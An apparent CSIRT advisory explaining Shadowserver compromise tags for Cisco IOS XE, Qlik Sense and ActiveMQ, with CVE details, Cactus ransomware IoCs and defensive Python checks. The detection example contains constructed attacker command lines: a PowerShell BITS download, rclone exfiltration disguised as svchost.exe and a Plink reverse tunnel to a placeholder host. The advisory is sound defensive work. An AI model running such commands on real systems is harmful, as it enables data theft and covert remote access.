CVEs - Compromised Website Report

This report identifies compromised website(s) reported to be running software applications that are vulnerable to exploitation through Common Vulnerabilities and Exposures (CVEs) publicly disclosed by the respective software vendors.

Affected Software Applications


No. Application
1. Cisco IOS XE WebUI.
2. Qlik Sense.

Problem

Cisco IOS XE Web User Interface (WebUI)

The Cisco Internetwork Operating System (IOS) is a family of proprietary network operating systems used on many router and switch models manufactured by Cisco Systems.  It packages routing, switching, internetworking and telecommunications functions into a multitasking operating system.

Cisco IOS XE does not run IOS as the operating system.  Instead it runs a Linux kernel on which IOS itself runs as a separate process (daemon), alongside the other system functions, each in its own process.  This has several advantages: the workload can be spread across multiple CPUs, and a crash of a single process no longer takes down the entire OS.

A Web user interface allows a user to interact with content or software running on a remote server or router through a Web browser: the content or Web page is downloaded from the Web server and the user interacts with it in the browser, which acts as the client.  The Cisco IOS XE Web User Interface (WebUI) is used to configure a router after it has been installed so that traffic can pass through the network; it also provides network administrators with a single tool for provisioning, monitoring and optimising devices.

On 16th Oct 2023, Cisco Systems, Inc. publicly disclosed CVE-2023-20198, a privilege escalation vulnerability in the Web User Interface (WebUI) feature of Cisco IOS XE software, affecting both physical and virtual devices that have the HTTP or HTTPS Server feature enabled.  Exploitation allows a remote, unauthenticated attacker to obtain initial access and create an account with privilege level 15 (full administrative rights); in the observed attacks this access was then used to create a further local user account with normal privileges.  No software patches or updates were released on the date of disclosure because of the ongoing investigation into exploitation of the WebUI feature in the wild.  Cisco Systems, Inc. has since released a number of fixed software releases.

On 25th Oct 2023, Cisco Systems, Inc. publicly disclosed CVE-2023-20273, a command injection vulnerability in the WebUI feature of Cisco IOS XE software.  An attacker who had obtained access and created a local user account with normal privileges through exploitation of CVE-2023-20198 could then inject and run arbitrary commands with root privileges on the underlying operating system; in the observed attacks this second step was used to write the implant to the file system.
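The two checks a constituent can run offline against a saved 'show running-config' follow, as an added example (this is not Cisco or Talos code): is the WebUI reachable from anywhere, and are there privilege 15 accounts the operator did not create. The third function interprets the body returned by the check Cisco Talos published for the original implant (a POST to /webui/logoutconfirm.html?logon_hash=1). Both configuration excerpts and the KNOWN_PRIV15 baseline are constructed for this example.

```python
"""Offline triage for the Cisco IOS XE WebUI issues above (CVE-2023-20198 /
CVE-2023-20273). Added example, not Cisco or Talos code. It takes the text of
'show running-config' saved from a device; the two configs below are
constructed for this example, as is the KNOWN_PRIV15 baseline."""
import re

# Constructed running-config excerpt: WebUI enabled but limited by an access-class,
# plus one privilege-15 account the operator did not create.
RESTRICTED_CONFIG = """\
version 17.6
hostname edge-rtr-01
!
username netadmin privilege 15 secret 9 $9$REDACTED
username cisco_tac_admin privilege 15 secret 9 $9$REDACTED
username backup privilege 1 secret 9 $9$REDACTED
!
ip http server
ip http secure-server
ip http access-class ipv4 WEBUI-ACL
!
ip access-list standard WEBUI-ACL
 permit 10.10.0.0 0.0.255.255
 deny   any
!
end
"""

# Constructed running-config excerpt: the weak setting, WebUI reachable by anyone.
EXPOSED_CONFIG = """\
version 17.6
hostname edge-rtr-02
!
username netadmin privilege 15 secret 9 $9$REDACTED
!
ip http server
ip http secure-server
!
end
"""

# Privilege-15 accounts the operator expects to exist (constructed baseline).
KNOWN_PRIV15 = {"netadmin"}

def webui_exposure(config: str) -> dict:
    """Report whether the HTTP/HTTPS server is on and whether an access-class
    limits who can reach it. 'exposed' is True when a listener is enabled and
    nothing restricts the source addresses, the precondition for CVE-2023-20198."""
    lines = [ln.strip() for ln in config.splitlines()]
    http = "ip http server" in lines
    https = "ip http secure-server" in lines
    acl = None
    for ln in lines:
        m = re.match(r"ip http access-class (?:ipv4 )?(\S+)$", ln)
        if m:
            acl = m.group(1)
    return {"http": http, "https": https, "access_class": acl,
            "exposed": (http or https) and acl is None}

def unexpected_priv15_users(config: str, baseline=KNOWN_PRIV15) -> list:
    """Privilege-15 usernames not in the baseline. Talos reported attacker-created
    accounts such as 'cisco_tac_admin' and 'cisco_support'; these survive a reboot
    even though the implant itself does not."""
    found = re.findall(r"^username (\S+) privilege 15\b", config, flags=re.M)
    return sorted(u for u in found if u not in baseline)

# Talos published a check: POST /webui/logoutconfirm.html?logon_hash=1 to the
# device; an 18-character hexadecimal string in the body means the original
# BadCandy implant answered. Later implant variants changed their behaviour, so
# a negative result does not prove the device is clean.
IMPLANT_BODY_RE = re.compile(r"^[0-9a-f]{18}$")

def implant_check_positive(body: str) -> bool:
    """Interpret the response body of the Talos logoutconfirm check."""
    return IMPLANT_BODY_RE.match(body.strip()) is not None

if __name__ == "__main__":
    for name, cfg in (("restricted", RESTRICTED_CONFIG), ("exposed", EXPOSED_CONFIG)):
        print(name, webui_exposure(cfg), unexpected_priv15_users(cfg))
```

A device whose report shows exposed=True should have the HTTP server disabled or access-classed before anything else; an unexpected privilege 15 user is a stronger signal than the implant check, because the implant is removed by a reboot while the account is not.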

Qlik Sense

Qlik Sense is data analysis and visualisation software.  It is built on the associative QIX engine, which lets users link and associate data from varied sources and perform dynamic searches and selections.  It serves as a data analytics platform for a wide range of users, from non-technical to technical, and its visualisation features make it possible to display and analyse data graphically.

By default, HTTP listens on port 80/TCP and HTTPS listens on port 443/TCP.

In August 2023, two security vulnerabilities in Qlik Sense Enterprise for Windows were identified by Adam Crosser and Thomas Hendrickson of Praetorian, a cybersecurity company based in Austin, Texas, USA.  The vulnerabilities involve HTTP request tunnelling and path traversal.  Praetorian also found that, when the two are chained and successfully exploited, they can lead to compromise of the server running Qlik Sense, including unauthenticated remote code execution (RCE).

On 29th Aug 2023, Qlik publicly disclosed CVE-2023-41265 and CVE-2023-41266, which affect Qlik Sense Enterprise for Windows.

On 20th Sep 2023, Qlik publicly disclosed CVE-2023-48365, which affects Qlik Sense Enterprise for Windows.

On 25th April 2024, Willem Zeeman and Yun Zheng Hu of Fox-IT (part of NCC Group, the information assurance firm based in Manchester, UK), working with a number of Dutch cyber security firms that had been researching the Cactus ransomware group, reported the group's modus operandi of exploiting Qlik Sense systems for initial access, which it has been actively targeting since November 2023.

Fox-IT and their colleagues from the Dutch cyber security firms found that the Cactus ransomware group uses a particular technique for initial access to Qlik Sense systems.  Based on this, Fox-IT developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to this initial-access technique and, more critically, which systems are already compromised.

On 28th Nov 2023, Arctic Wolf Networks, the computer and network security company based in Eden Prairie, Minnesota, USA, published a list of Indicators of Compromise (IoCs) observed in its incident response (IR) investigations into a new Cactus ransomware campaign exploiting publicly exposed installations of Qlik Sense.

Constituents are advised to take appropriate action if a host running Qlik Sense is identified in the 'CVEs - Compromised Website Report'.

Cactus Ransomware Group - Indicators of Compromise (IoCs).


No. Reported by Description Article - IOCs
1. Fox-IT. The Cactus ransomware group redirects the output of executed commands to a TrueType font file named qle.ttf, likely an abbreviation of "qlik exploit".  Fox-IT has also observed instances where qle.woff was used.  Neither file is part of a default Qlik Sense server installation.  Fox-IT found that files with a font extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched, which may explain why the group chose to store command output in font files within the fonts directory; it also makes those files a useful Indicator of Compromise (IoC). Fox-IT - Identifying Cactus ransomware victims
2. Arctic Wolf Labs. The Cactus ransomware group leverages PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools for persistence and remote control, including renamed ManageEngine UEMS executables with a ZIP extension masquerading as Qlik files; these are renamed again after download and invoked for silent installation.  AnyDesk is downloaded directly from anydesk.com.  A Plink (PuTTY Link) binary is downloaded and renamed to putty.exe.  Current evidence shows RDP used for lateral movement, the WizTree disk space analyser downloaded, and rclone (renamed svchost.exe) used for data exfiltration. ArcticWolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign
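The IoCs in the two rows above expressed as detection logic, as an added example (not Fox-IT or Arctic Wolf code): four rules over process-creation telemetry for the Arctic Wolf host indicators, and a classifier for the Fox-IT font-file probe. The process records are constructed Sysmon-style lines, and FONT_PATH is this example's assumption of where Qlik Sense exposes the fonts directory; verify it against the Fox-IT article before scanning.

```python
"""Detection logic for the Cactus IoCs in the table above, run over constructed
sample telemetry. Added example, not Fox-IT or Arctic Wolf code. The log format
(Sysmon-style 'Image=... CommandLine="..."' records) and the FONT_PATH are
assumptions made for this example."""
import re
from dataclasses import dataclass

@dataclass
class Hit:
    rule: str
    event: str

# --- Arctic Wolf host IoCs -------------------------------------------------------
# Constructed process-creation events (not from a real incident). Event 2 is a
# legitimate svchost.exe and must not fire; event 5 is normal Qlik activity.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -c Start-BitsTransfer -Source http://198.51.100.7/QlikUpdate.zip -Destination C:\ProgramData\QlikUpdate.zip"',
    r'Image=C:\Windows\System32\svchost.exe CommandLine="svchost.exe -k netsvcs -p"',
    r'Image=C:\ProgramData\svchost.exe CommandLine="svchost.exe copy C:\Finance remote:exfil --transfers 8"',
    r'Image=C:\Users\Public\putty.exe CommandLine="putty.exe -ssh -N -R 3389:127.0.0.1:3389 user@198.51.100.9 -pw x"',
    r'Image=C:\Program Files\Qlik\Sense\Engine\Engine.exe CommandLine="Engine.exe"',
]

SYSTEM32 = "c:\\windows\\system32\\"

# (rule name, predicate over lower-cased image path and raw command line)
RULES = [
    # PowerShell driving BITS to fetch tooling
    ("powershell_bits_download",
     lambda img, cmd: img.endswith("powershell.exe")
                      and re.search(r"start-bitstransfer|bitsadmin", cmd, re.I) is not None),
    # rclone renamed svchost.exe: the real one only lives in System32
    ("svchost_outside_system32",
     lambda img, cmd: img.endswith("\\svchost.exe") and not img.startswith(SYSTEM32)),
    # putty.exe run with no-shell / tunnel switches (-N, -R, -L) is Plink's pattern
    ("plink_as_putty",
     lambda img, cmd: img.endswith("\\putty.exe")
                      and re.search(r"\s-[NRL]\b", cmd) is not None),
    # renamed ManageEngine UEMS installers delivered as 'Qlik' zips
    ("qlik_named_zip_download",
     lambda img, cmd: re.search(r'qlik[^\s"]*\.zip', cmd, re.I) is not None),
]

EVENT_RE = re.compile(r'^Image=(.+?) CommandLine="(.*)"$')

def parse_event(line: str):
    """Split one constructed record into (lower-cased image path, command line)."""
    m = EVENT_RE.match(line)
    return (m.group(1).lower(), m.group(2)) if m else ("", "")

def scan_events(events) -> list:
    hits = []
    for line in events:
        img, cmd = parse_event(line)
        hits.extend(Hit(name, line) for name, pred in RULES if pred(img, cmd))
    return hits

# --- Fox-IT network fingerprint ---------------------------------------------------
# qle.ttf / qle.woff are not part of a default install and the fonts directory is
# served without authentication, so a 200 for either name is itself the IoC.
# FONT_PATH is this example's assumption; confirm it against the Fox-IT article.
FONT_PATH = "/resources/qmc/fonts/"
FONT_IOCS = ("qle.ttf", "qle.woff")

def classify_font_probe(name: str, status: int) -> str:
    """Interpret one GET of https://<host>FONT_PATH<name>."""
    if name not in FONT_IOCS:
        raise ValueError("not a Cactus font IoC")
    if status == 200:
        return "compromised"
    if status == 404:
        return "not-found"
    return "inconclusive"   # e.g. 401/403 when fonts are not exposed after all

if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(h.rule, "<-", h.event[:60])
    print(classify_font_probe("qle.ttf", 200))
```

The svchost rule keys on location rather than name because the attacker keeps the legitimate file name; the putty rule keys on switches because the file name is legitimate too. A "not-found" probe result says nothing about whether the server is patched, only that this particular artefact is absent.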

Common Vulnerabilities & Exposures (CVEs)


Systems used for reporting and assessing the severity of security vulnerabilities.

No. System Description
1. Common Vulnerabilities and Exposures (CVE). The CVE system is used to identify, define, catalogue and publicly disclose known information-security vulnerabilities and exposures.
2. The Common Vulnerability Scoring System (CVSS). CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities.  It provides a numerical (0-10) representation of the severity of an information security vulnerability.

CVSSv3 Qualitative Severity Rating Scale.

No. Base Score Range Severity
1. 0.0 None
2. 0.1 - 3.9 Low
3. 4.0 - 6.9 Medium
4. 7.0 - 8.9 High
5. 9.0 - 10.0 Critical

CVEs - Compromised Website Report.

No. CVE Report Description CVSSv3 Advisory
1. CVE-2023-20198
Privilege Escalation Vulnerability in the WebUI feature of Cisco's IOS XE software. 10.0 Cisco Security Advisory
2. CVE-2023-20273
A Command Injection Vulnerability in the WebUI feature of Cisco's IOS XE software. 7.2 Cisco Security Advisory
3. CVE-2023-41265
An HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited, an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software. 9.6 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
4. CVE-2023-41266
A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow them to send further requests to unauthorized endpoints. 8.2 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265)
5. CVE-2023-48365
Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. 9.6 Qlik Community - Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).
6. CVE-2023-46604
The Java OpenWire protocol marshaller is vulnerable to remote code execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fix this issue. 9.8 Apache ActiveMQ - Update on CVE-2023-46604

Note: Clicking a CVE link in the table above directs Constituents to the www.mitre.org page containing the relevant information on that CVE.  From there, the www.cve.org link leads to the www.cve.org site, where further information on the CVE can be accessed by entering the CVE number in the Find field.

Solution


Shadowserver Foundation - Compromised Website Report - Tag Index.

Note: In the 'Tag' column of its report, the Shadowserver Foundation includes a list of terms indicating the type of vulnerability or compromise associated with the specific host identified in the report.

No. Tag Description
1. badcandy;device-implant;ssl. Attackers exploit the Cisco IOS XE WebUI vulnerabilities to create high-privilege accounts and install a Lua-based backdoor, resulting in takeover of the device.  The BadCandy implant is written in Lua, consists of 29 lines of code and facilitates arbitrary command execution.  The host was reached over HTTPS.
2. badcandy;device-implant;http. Attackers exploit the Cisco IOS XE WebUI vulnerabilities to create high-privilege accounts and install a Lua-based backdoor, resulting in takeover of the device.  The BadCandy implant is written in Lua, consists of 29 lines of code and facilitates arbitrary command execution.  The host was reached over plain HTTP.
3. qliksense;cve-2023-48365. This indicates that the Qlik Sense Service is vulnerable to CVE-2023-48365.
4. injected-code;qliksense;ssl;webshell. This indicates that injected code (a webshell) has been observed on the Qlik Sense service over HTTPS, i.e. the host is already compromised, not merely vulnerable.
5. godzilla-webshell. This indicates that a Godzilla webshell has been observed on the Apache ActiveMQ service, i.e. CVE-2023-46604 has already been exploited on the host.

Recommendations.

No. Tag Recommendations
1. badcandy;device-implant;ssl. Cisco strongly recommends that customers disable the HTTP Server feature on all internet-facing systems (no ip http server / no ip http secure-server) or restrict its access to trusted source addresses with an access class.  Disabling the HTTP Server feature removes the attack vector for these vulnerabilities and may be a suitable mitigation until affected devices can be upgraded.  Cisco has released fixed IOS XE software in the 17.9, 17.6, 17.3 and 16.12 release trains (17.9.4a, 17.6.6a, 17.3.8a and 16.12.10a) to patch CVE-2023-20198 and CVE-2023-20273.  Note that a reboot or upgrade removes the implant but not the accounts the attacker created; review the configuration and remove any unexpected privilege 15 users.
2. badcandy;device-implant;http. As for badcandy;device-implant;ssl above; the only difference is that the host was reached over plain HTTP.
3. qliksense;cve-2023-48365. Constituents are advised to read the article published by Fox-IT on 25th April 2024 and the article published by Arctic Wolf Labs on 28th Nov 2023; both contain details of the modus operandi of the Cactus ransomware group in exploiting Qlik Sense systems, together with a list of Indicators of Compromise (IoCs).  (See Cactus Ransomware Group - Indicators of Compromise (IoCs) above for links.)
4. injected-code;qliksense;ssl;webshell. Constituents are advised to disconnect their network from the internet; this cuts off the Cactus ransomware group's access to the compromised computer and prevents further data exfiltration.  Disconnect backup devices from the compromised computer and protect all data backups.  Avoid switching the computer off, as this may destroy valuable forensic evidence needed to establish how the computer and network were breached.  Change passwords for all login accounts on the network and cloud services, using a computer on a separate network.  Investigate the incident to establish the facts and consult cyber security experts if necessary.  In the event of a crime, Constituents are advised to report the incident to An Garda Síochána.
5. godzilla-webshell. Users of ActiveMQ Classic and ActiveMQ Artemis brokers, and of any Java-based OpenWire client (e.g. a Maven dependency on activemq-client), are recommended to upgrade: ActiveMQ Classic to 6.0.0, 5.18.3, 5.17.6, 5.16.7 or 5.15.16, and ActiveMQ Artemis to 2.31.2.  A host carrying this tag should additionally be treated as compromised and investigated, since the tag reflects an installed webshell rather than merely an unpatched version.
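A patched-or-not check for the two products with explicit fixed releases in the recommendations above (Cisco IOS XE for tags 1 and 2, Apache ActiveMQ for tag 5), as an added example that is not vendor code. The fixed-version data is transcribed from this report; the four IOS XE fixed builds are the 'a' rebuilds of the listed trains, and any release train not listed returns "unknown" rather than a guess.

```python
"""Patched-or-not checks for Cisco IOS XE (CVE-2023-20198/20273) and Apache
ActiveMQ (CVE-2023-46604) based on the fixed releases in the recommendations
above. Added example, not vendor code. Trains not listed here return 'unknown'."""
import re
from typing import Tuple

# Cisco IOS XE: first fixed build per train. The trailing letter is Cisco's
# rebuild marker, so 17.9.4 is vulnerable while 17.9.4a and 17.9.5 are fixed.
IOSXE_FIXED = {
    (16, 12): (16, 12, 10, "a"),
    (17, 3): (17, 3, 8, "a"),
    (17, 6): (17, 6, 6, "a"),
    (17, 9): (17, 9, 4, "a"),
}

# Apache ActiveMQ Classic: first fixed build per train; every 6.x carries the fix.
ACTIVEMQ_CLASSIC_FIXED = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
ACTIVEMQ_ARTEMIS_FIXED = (2, 31, 2)

IOSXE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]?)$")

def parse_iosxe(version: str) -> Tuple[int, int, int, str]:
    """'17.9.4a' -> (17, 9, 4, 'a'); the rebuild letter sorts after '' so that
    tuple comparison places 17.9.4 below 17.9.4a."""
    m = IOSXE_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised IOS XE version: {version!r}")
    major, minor, patch, rebuild = m.groups()
    return int(major), int(minor), int(patch), rebuild

def iosxe_status(version: str) -> str:
    """'fixed', 'vulnerable', or 'unknown' for trains this report does not list."""
    v = parse_iosxe(version)
    fixed = IOSXE_FIXED.get(v[:2])
    if fixed is None:
        return "unknown"
    return "fixed" if v >= fixed else "vulnerable"

def parse_activemq(version: str) -> Tuple[int, ...]:
    """'5.17.6-SNAPSHOT' -> (5, 17, 6); qualifiers after '-' are dropped."""
    core = version.strip().split("-")[0]
    return tuple(int(p) for p in core.split("."))

def activemq_classic_status(version: str) -> str:
    v = parse_activemq(version)
    if v[0] >= 6:
        return "fixed"
    fixed = ACTIVEMQ_CLASSIC_FIXED.get(v[:2])
    if fixed is None:
        # 5.14 and older never received a fix: only moving to a fixed train helps
        return "vulnerable"
    return "fixed" if v >= fixed else "vulnerable"

def activemq_artemis_status(version: str) -> str:
    return "fixed" if parse_activemq(version) >= ACTIVEMQ_ARTEMIS_FIXED else "vulnerable"

if __name__ == "__main__":
    for ver in ("17.9.4", "17.9.4a", "17.6.6a", "17.12.1"):
        print("IOS XE", ver, iosxe_status(ver))
    for ver in ("5.18.2", "5.18.3", "5.14.5", "6.0.1"):
        print("ActiveMQ Classic", ver, activemq_classic_status(ver))
    print("ActiveMQ Artemis 2.31.2", activemq_artemis_status("2.31.2"))
```

A version check only says whether the hole is closed; for a host already tagged badcandy or godzilla-webshell it settles nothing about the compromise, which still needs the account review and webshell removal described in the rows above.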

Additional Information

Cisco Security Advisory - Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature.
CISCO Talos - Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerabilities.
Rapid7 - CVE-2023-20198: Active Exploitation of Cisco IOS XE Zero-Day Vulnerability.
US CISA - Guidance for Addressing Cisco IOS XE Web UI.
Shadowserver Foundation - Vulnerable or Compromised Qlik Sense Special Report.
Fox-IT - Sifting through the Spines: Identifying (potential) Cactus Ransomware Victims.
Arctic Wolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign.
Arctic Wolf Labs - CVE-2023-41265, CVE-2023-41266 & CVE-2023-48365: Multiple Vulnerabilities in Qlik Sense Enterprise Actively Exploited.
ZeroQlik: Achieving Unauthenticated Remote Code Execution via HTTP Request Tunneling and Path Traversal.
Cybersecuritydive - Schneider Electric hit by ransomware attack against its sustainability business division.
SOCRadar - Dark Web Profile: Cactus Ransomware.
Bitdefender - CACTUS: Analyzing a Coordinated Ransomware Attack on Corporate Networks.
Qlik Help.
Qlik Sense Architecture – 4 Major Components of Architecture.
101. What is QIX and Why Should You Care?.
Qlik Sense Tutorial For Beginners – Features and Architecture.
PrickSense: How Cactus Exploits Qlik Sense.
RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1.
Cyberveilig Nederland - Press release: Melissa partnership finds several Dutch victims of ransomware group Cactus.
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).
Shadowserver Foundation - Accessible ActiveMQ Service Report.
Apache ActiveMQ Vulnerability Leads to Stealthy Godzilla Webshell.